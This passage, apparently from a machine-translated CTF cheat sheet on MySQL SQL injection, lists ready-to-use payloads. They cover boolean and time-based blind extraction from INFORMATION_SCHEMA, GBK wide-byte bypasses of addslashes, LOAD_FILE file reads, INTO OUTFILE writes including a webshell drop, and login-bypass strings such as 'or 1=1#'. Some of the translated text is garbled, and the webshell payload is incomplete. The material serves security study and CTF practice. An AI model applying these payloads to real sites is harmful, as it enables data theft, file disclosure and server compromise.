did not echo the extracted data, but depending on whether the statement is executed successfully or not, there will be some corresponding changes. 135 | The correct / wrong statement makes the page have a moderate change. You can try using Boolean injection 136 | The correct statement returns the normal page, the wrong statement returns the common error page. You can try using Boolean injection. 137 | Submit the wrong statement, does not affect the normal output of the page. Try using delayed injection. 138 | Several simple sentences to judge, in the real need to change according to the situation: 139 | CASE 140 | IF () 141 | IFNULL () 142 | NULLIF () 143 | Boolean blinds - based on the response 144 | Submit a logic statement to infer a bit of information. Because injection requires (general) character-by-character execution, scripts or tools (such as the burp suite) need to be used. The following is: 145 | payload 146 | 147 | ------------------- ----------------- 148 | ------------------- ----------------- 149 | ' OR (SELECT ASCII(SUBSTR(DATABASE(),i,1) ) < j) # 150 | 151 | ' OR (SELECT ASCII(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) ) < j) # 152 | 153 | ' OR (SELECT SUBSTR(DATABASE(),i,1) < j) # 154 | 155 | ' OR (SELECT SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j) # 156 | 157 | ' OR SUBSTR((SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA LIMIT k,1),i,1) < j # 158 | 159 | ... 160 | 161 | Script use, visible: ctf blind using script points: 162 | Pay attention to the coding problem 163 | Pay attention to the exception handling 164 | Pay attention to the border processing 165 | Delayed blinds - based on time 166 | Generally use a few functions. The effect of using these is to delay the operation of mysql, and thus detect the situation with the usual difference: 167 | SLEEP (n) to stop mysql n seconds 168 | BENCHMARK (count, expr) Repeats the countTimes occurrence of the expression expr 169 | Some notes: 170 | The use of time-based blinds is not as accurate as it depends on the current network environment. 171 | Time delay is best not to exceed 30 seconds, otherwise easily lead to mysql API connection timeout. 172 | When the page does not see any significant change, then consider the choice of using delayed injection. 173 | Detection method 174 | 1 OR SLEEP(25)=0 LIMIT 1 # 175 | 1) OR SLEEP(25)=0 LIMIT 1 # 176 | 1' OR SLEEP(25)=0 LIMIT 1 # 177 | ') OR SLEEP(25)=0 LIMIT 1 # 178 | 1)) OR SLEEP(25)=0 LIMIT 1 # 179 | SELECT SLEEP(25) # 180 | payload 181 | 182 | UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,BENCHMARK(100000,SHA1(1)),0) 183 | 184 | UNION SELECT IF(SUBSTR((SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),i,1) < j,SLEEP(10),0) 185 | 186 | ... 187 | Wide byte injection 188 | principle 189 | Have the following php code: 190 | ... 191 | mysql_query("SET NAMES 'gbk'"); 192 | .... 193 | $name = isset($_GET['name']) ? addslashes($_GET['name']) : 1; 194 | $sql = "SELECT * FROM test WHERE names='{$name}'"; 195 | addslashes () adds a single or double quotation mark \. When mysql GBK character set, it will be two characters as a Chinese character, such as% df% 5c for transport. We enter name=root%df%27,% the server will appear the following conversion: root%df%27-> root%df%5c%27-> root運'. 196 | More can be seen: Character Encoding and SQL Injection in White Box Audit 197 | payload 198 | Eat\ 199 | index.php?name=1%df' 200 | index.php?name=1%a1' 201 | index.php?name=1%aa' 202 | ... 203 | After being addedlashes,% XX% 5c appears. If the ascii code value of the current character is greater than 128, it will be considered as a wide character, even if it is not a Chinese character. So not only% df can eat '\'. 204 | use\ 205 | index.php?name=%**%5c%5c%27 206 | Secondary injection 207 | File read and write 208 | Use sql injection can import export file, get the file content, or write to the file content. Query user read and write permissions: 209 | SELECT file_priv FROM mysql.user WHERE user = 'username'; 210 | load_file () read 211 | condition 212 | Need to read the file permissions 213 | Need to know the absolute physical path of the file. 214 | The size of the file to read must be less than max_allowed_packet 215 | SELECT @@max_allowed_packet; 216 | payload 217 | Directly use the absolute path, pay attention to the processing of the slash path. 218 | UNION SELECT LOAD_FILE("C://TEST.txt") # 219 | 220 | UNION SELECT LOAD_FILE("C:/TEST.txt") # 221 | 222 | UNION SELECT LOAD_FILE("C:\\TEST.txt") # 223 | Use encoding 224 | 225 | UNION SELECT LOAD_FILE(CHAR(67,58,92,92,84,69,83,84,46,116,120,116)) # 226 | 227 | UNION SELECT LOAD_FILE(0x433a5c5c544553542e747874) # 228 | select Export 229 | condition 230 | General to specify the absolute path 231 | The directory to be exported has write permission 232 | The file to outfile can not already exist 233 | payload 234 | UNION SELECT DATABASE() INTO OUTFILE 'C:\\phpstudy\\WWW\\test\\1'; 235 | 236 | UNION SELECT DATABASE() INTO OUTFILE 'C:/phpstudy/WWW/test/1'; 237 | Write webshell 238 | condition 239 | Need to know the site's absolute physical path, so after export webshell can be accessed 240 | Need to export the directory can write permission. 241 | payload 242 | UNION SELECT "" INTO OUTFILE 'C:/phpstudy/WWW/test/webshell.php'; 243 | Universal password login 244 | admin '- 245 | admin '# 246 | admin '/ * 247 | or '=' or 248 | 'or 1 = 1- 249 | 'or 1 = 1 # 250 | 'or 1 = 1 / * 251 | ') or' 1 '=' 1- 252 | ') or (' 1 '=' 1- 253 | PDO heap query 254 | --------------------------------------------------------------------------------